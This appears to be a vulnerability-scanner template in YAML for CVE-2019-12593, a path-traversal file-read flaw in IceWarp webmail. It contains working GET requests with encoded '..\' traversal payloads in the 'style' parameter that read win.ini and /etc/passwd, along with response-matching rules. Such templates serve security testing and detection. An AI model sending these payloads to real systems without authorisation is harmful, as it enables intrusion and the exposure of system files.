-
Notifications
You must be signed in to change notification settings - Fork 36
/
Copy pathCVE-2019-12593.yaml
30 lines (28 loc) · 966 Bytes
/
CVE-2019-12593.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
id: cve-2019-12593
info:
name: IceWarp LFI
risk: High
params:
- root: '{{.BaseURL}}'
variables:
- endpoint: |
webmail/calendar/minimizer/index.php
requests:
- method: GET
url: >-
{{.root}}/{{.endpoint}}?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
- >-
StatusCode() == 200 && StringSearch("resBody", "[intl]")
- method: GET
url: >-
{{.root}}/{{.endpoint}}?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
- >-
StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
references:
- https://www.cvebase.com/cve/2019/12593